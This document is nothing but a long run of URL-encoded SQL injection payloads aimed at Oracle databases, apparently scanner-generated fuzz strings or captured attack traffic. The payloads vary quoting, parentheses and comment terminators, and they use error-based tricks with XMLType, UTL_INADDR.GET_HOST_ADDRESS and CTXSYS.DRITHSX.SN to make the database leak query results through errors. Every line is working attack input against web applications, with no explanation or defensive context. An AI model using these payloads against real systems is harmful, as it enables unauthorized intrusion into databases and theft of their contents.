1%29%20WHERE%203318%3D3318%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1%27%29%20WHERE%208035%3D8035%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1%27%20WHERE%207880%3D7880%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1%22%20WHERE%203626%3D3626%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1%27%20%7C%7C%20%28SELECT%206459%20FROM%20DUAL%20WHERE%207414%3D7414%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209378%20WHERE%208369%3D8369%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%209716%20FROM%20DUAL%20WHERE%206864%3D6864%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29 1%20%2B%20%28SELECT%209462%20WHERE%204471%3D4471%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29 1%27%20%2B%20%28SELECT%20%27JZpZ%27%20FROM%20DUAL%20WHERE%205119%3D5119%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27wVEp%27%20WHERE%203549%3D3549%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%23 1%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 1%27%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 1%27%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 1%22%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 1%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%284695%3D4695 1%29%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%283435%3D3435 1%29%29%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%283988%3D3988 1%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 1%27%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%27tjca%27%3D%27tjca 1%27%29%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27mPHU%27%3D%27mPHU 1%27%29%29%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27deCP%27%3D%27deCP 1%27%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%27rMkg%27%3D%27rMkg 1%27%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%27izQd%27%20LIKE%20%27izQd 1%27%29%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27MEzc%27%20LIKE%20%27MEzc 1%27%29%29%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27IotR%27%20LIKE%20%27IotR 1%27%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%27zgyU%27%20LIKE%20%27zgyU 1%22%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%22PfXf%22%3D%22PfXf 1%22%29%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22lImg%22%3D%22lImg 1%22%29%29%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22HCSx%22%3D%22HCSx 1%22%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%22vAxj%22%3D%22vAxj 1%22%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%22aghH%22%20LIKE%20%22aghH 1%22%29%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22KZMF%22%20LIKE%20%22KZMF 1%22%29%29%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22wXMq%22%20LIKE%20%22wXMq 1%22%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%22rGTs%22%20LIKE%20%22rGTs 1%29%20WHERE%202333%3D2333%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 1%27%29%20WHERE%202062%3D2062%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 1%27%20WHERE%201349%3D1349%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 1%22%20WHERE%204662%3D4662%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 1%27%20%7C%7C%20%28SELECT%202196%20FROM%20DUAL%20WHERE%201912%3D1912%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204531%20WHERE%202347%3D2347%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%205011%20FROM%20DUAL%20WHERE%204658%3D4658%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20%29 1%20%2B%20%28SELECT%203707%20WHERE%201987%3D1987%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20%29 1%27%20%2B%20%28SELECT%20%27lVdm%27%20FROM%20DUAL%20WHERE%203481%3D3481%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27gemE%27%20WHERE%209023%3D9023%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%209898%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289898%3D9898%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20%23 1%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 1%27%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 1%27%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 1%22%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 1%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%288523%3D8523 1%29%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%286166%3D6166 1%29%29%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%287535%3D7535 1%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 